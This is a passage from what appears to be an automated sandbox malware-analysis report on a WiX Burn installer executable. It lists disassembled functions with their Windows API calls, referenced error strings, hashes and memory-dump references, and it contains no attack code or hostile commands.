                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$lstrlen
                                                                                                                                                                                                                                                                            • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1752758355-602586573
                                                                                                                                                                                                                                                                            • Opcode ID: 6c2df6594618d2f2ab185ac877193b3eee96b2b05c4fafe5e13f30b7454f85a2
                                                                                                                                                                                                                                                                            • Instruction ID: ee889892b3ccbc079693cc141f413f470b1a44846e7d7b3061d16af2887426d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c2df6594618d2f2ab185ac877193b3eee96b2b05c4fafe5e13f30b7454f85a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F851A172940A19FBEF22AFD08C46F9F7F79EB44750F024165BA04B52A2D7708E10EB91
                                                                                                                                                                                                                                                                            Function 0093D815 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 159stringregistryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,008E6DA2,00000000,00000000,00000001,0090303D,?,878D30FF,00902F8D,00000000,00903085,67E85650,008E6CF2), ref: 0093D849
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,0090303D,00000001,00000000,0090303D,00000001,BundleUpgradeCode,00000000), ref: 0093D8D2
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,878D30FF,00902F8D,00000000,00903085,67E85650,008E6CF2,0090303D,00000001,00902F8D), ref: 0093D95B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 0093D876
                                                                                                                                                                                                                                                                            • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 0093D887
                                                                                                                                                                                                                                                                            • Failed to get total string size in bytes, xrefs: 0093D914
                                                                                                                                                                                                                                                                            • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0093D98B
                                                                                                                                                                                                                                                                            • BundleUpgradeCode, xrefs: 0093D82A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093D896, 0093D937, 0093D97F, 0093D984, 0093D99A
                                                                                                                                                                                                                                                                            • failed to copy string: %ls, xrefs: 0093D928
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$Value
                                                                                                                                                                                                                                                                            • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                                                                                                                                            • API String ID: 198323757-1095722736
                                                                                                                                                                                                                                                                            • Opcode ID: 70067a82d5fe33554bea01e4183eec6a0565628c4516e616c97848a6a59f1d80
                                                                                                                                                                                                                                                                            • Instruction ID: 62596fe4455fe5e7c9aa04331dc28f619d23b564e78c63d5db95abf175a49655
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70067a82d5fe33554bea01e4183eec6a0565628c4516e616c97848a6a59f1d80
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2841D472A41319BBEB11DF59DC5AF6F36BDEB85B04F110069FA05AB280D6B09E008B61
                                                                                                                                                                                                                                                                            Function 008FB35D Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 146COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,8000FFFF,?,?,00000000,?,?), ref: 008FB371
                                                                                                                                                                                                                                                                              • Part of subcall function 009434CC: ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,008FC427,?,?,00000004,?,00000004), ref: 009434F1
                                                                                                                                                                                                                                                                              • Part of subcall function 009434CC: GetLastError.KERNEL32(?,?,008FC427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009434FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read verification process id from parent pipe., xrefs: 008FB46B
                                                                                                                                                                                                                                                                            • Verification secret from parent does not match., xrefs: 008FB445
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\pipe.cpp, xrefs: 008FB3B7, 008FB3C2, 008FB3DC, 008FB432, 008FB43D, 008FB4B1, 008FB4DF, 008FB4EA
                                                                                                                                                                                                                                                                            • Verification secret from parent is too big., xrefs: 008FB3CA
                                                                                                                                                                                                                                                                            • Verification process id from parent does not match., xrefs: 008FB4F2
                                                                                                                                                                                                                                                                            • Failed to read size of verification secret from parent pipe., xrefs: 008FB38F
                                                                                                                                                                                                                                                                            • Failed to allocate buffer for verification secret., xrefs: 008FB3F3
                                                                                                                                                                                                                                                                            • Failed to inform parent process that child is running., xrefs: 008FB49F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2959708427-3721239626
                                                                                                                                                                                                                                                                            • Opcode ID: 8c33a6f9b2d15d492c84b752e50d7a68918ec0f68bbc045c2169c5901acc83bc
                                                                                                                                                                                                                                                                            • Instruction ID: ccb38506a4842702eb3e593e2e3ac4ebf0e1d31e8994272dbb686ebb6bf636ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c33a6f9b2d15d492c84b752e50d7a68918ec0f68bbc045c2169c5901acc83bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5410731A80319B6E7129A66CC4BFBF7A68FB55B14F204155BB10FB2C2D3B49D009799
                                                                                                                                                                                                                                                                            Function 008E5A09 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,008E41A9,?,?,?,00000000), ref: 008E5A5C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E41A9,?,?,?,00000000), ref: 008E5A68
                                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,008E41A9,?,?,?,00000000), ref: 008E5B05
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E41A9,?,?,?,00000000), ref: 008E5B11
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4064601616-3610958334
                                                                                                                                                                                                                                                                            • Opcode ID: 8b94c1c519248538d085666a9802f7498df8638f7603b63fc3928a03de7f7178
                                                                                                                                                                                                                                                                            • Instruction ID: 59c05544cea2c3191690d42c935d6dfa2bbb4d06009c15f3f955300724655d35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b94c1c519248538d085666a9802f7498df8638f7603b63fc3928a03de7f7178
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941AA36A81A7577DB3296468C4EF5F3D68FB83BA9F110125FE04FF180E6748900D691
                                                                                                                                                                                                                                                                            Function 009401DE Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 137memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 0094022F
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 760788290-2059256487
                                                                                                                                                                                                                                                                            • Opcode ID: acfe020991b19de3907c1ac7d3e9fb52ad1c48d090c4aef7bda5e48078122c5f
                                                                                                                                                                                                                                                                            • Instruction ID: 2e023943e38d20086389312491dd0bd9fc0aea98f3f02728dcb1b56f9a55c467
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acfe020991b19de3907c1ac7d3e9fb52ad1c48d090c4aef7bda5e48078122c5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3641EE76740315BBEB129F54CC4EF6E3B69EBC5B15F148058FA05AB2D0EAB09E01DB90
                                                                                                                                                                                                                                                                            Function 0093FCA8 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 129COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDA6
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDE3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.reason., xrefs: 0093FD8A
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.errorCode., xrefs: 0093FCD3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0093FCE2
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.linepos., xrefs: 0093FD5E
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.line., xrefs: 0093FD35
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.filepos., xrefs: 0093FD0C
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.srcText ., xrefs: 0093FDC7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-2297621156
                                                                                                                                                                                                                                                                            • Opcode ID: 3818e8622a2316fb94e053a3bd3af2bb1391224e3012d95b8aba35b5a3b4c398
                                                                                                                                                                                                                                                                            • Instruction ID: d3df83e3bffe072f896830e3cc4a83341a63cb34b819188422c603232f935a2b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3818e8622a2316fb94e053a3bd3af2bb1391224e3012d95b8aba35b5a3b4c398
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87416275B80216FBEB158F50CD5AE6EBB78FF60B45F1140AAB901A71D0E7B06E009E50
                                                                                                                                                                                                                                                                            Function 008E90A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 008E90C8
                                                                                                                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 008E90DC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E90E8
                                                                                                                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008E915C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E9166
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2700948981-1940114245
                                                                                                                                                                                                                                                                            • Opcode ID: 408bc525aa6b7ec8c736c6e9a2ada8f5ced8452b996d1721d25acf798af9db9a
                                                                                                                                                                                                                                                                            • Instruction ID: a4d3790faa3aa6bd198d74c3f565657af85871939866ff351dce517ac2279291
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 408bc525aa6b7ec8c736c6e9a2ada8f5ced8452b996d1721d25acf798af9db9a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA31E876A8036676DB21966A8C4AFEF7A6CFB47B51F110115FF80FB2C1E5A49C0086E1
                                                                                                                                                                                                                                                                            Function 0093B9F6 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 112processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0093BA8E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0093BA98
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0093BAF7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0093BB09
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID: "%ls" %ls$D$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 161867955-2095590911
                                                                                                                                                                                                                                                                            • Opcode ID: 180041bdfc3fb4775f6fcdfbd2990dd7d84a556e43a31eed7d532a5a131e17bf
                                                                                                                                                                                                                                                                            • Instruction ID: e8d9f9685d6ed24be0d8b3eeaa242281351e15050cca6a68f5b6479a4531a519
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 180041bdfc3fb4775f6fcdfbd2990dd7d84a556e43a31eed7d532a5a131e17bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F314D75A01219BBDB119FD9CD49FEEBAB8EB04708F100025FA04F6290E7748E04DBA1
                                                                                                                                                                                                                                                                            Function 008E9AE0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008E9B0E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 008E9B15
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E9B21
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                            • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$msi
                                                                                                                                                                                                                                                                            • API String ID: 4275029093-1657635385
                                                                                                                                                                                                                                                                            • Opcode ID: 086ee1e6524693a8e47ffd361b36850b658124fe7d1b16885dc51de46b1c2296
                                                                                                                                                                                                                                                                            • Instruction ID: 025bd4d13af241426ad83dfefddbf24f0832943cfc22524d30b07266bbcafcc9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 086ee1e6524693a8e47ffd361b36850b658124fe7d1b16885dc51de46b1c2296
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96310632E4023AB6E7219B6ADC06FAF7668EB46B25F010115FA44FA2C0D6E49C0487E0
                                                                                                                                                                                                                                                                            Function 008FA9AD Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 62COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B0E2: EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,00000001,0000000C,0000000C,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000), ref: 0093B0F7
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B0E2: LeaveCriticalSection.KERNEL32(0097D4F0,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0093B2F9
                                                                                                                                                                                                                                                                            • OpenEventLogW.ADVAPI32(00000000,Application), ref: 008FA9D3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 008FA9DF
                                                                                                                                                                                                                                                                            • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00958E3C,00000000), ref: 008FAA36
                                                                                                                                                                                                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 008FAA3D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                            • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                                                                                                                            • API String ID: 1844635321-122217184
                                                                                                                                                                                                                                                                            • Opcode ID: 9e7065bccba6ec76a52de849453127f6336c4325d9903aad4166acea572085a8
                                                                                                                                                                                                                                                                            • Instruction ID: 15fbe89c1eb077884bffec76e18e5fbb37d7b536ea826ce2da09ae5f8ce68ddf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e7065bccba6ec76a52de849453127f6336c4325d9903aad4166acea572085a8
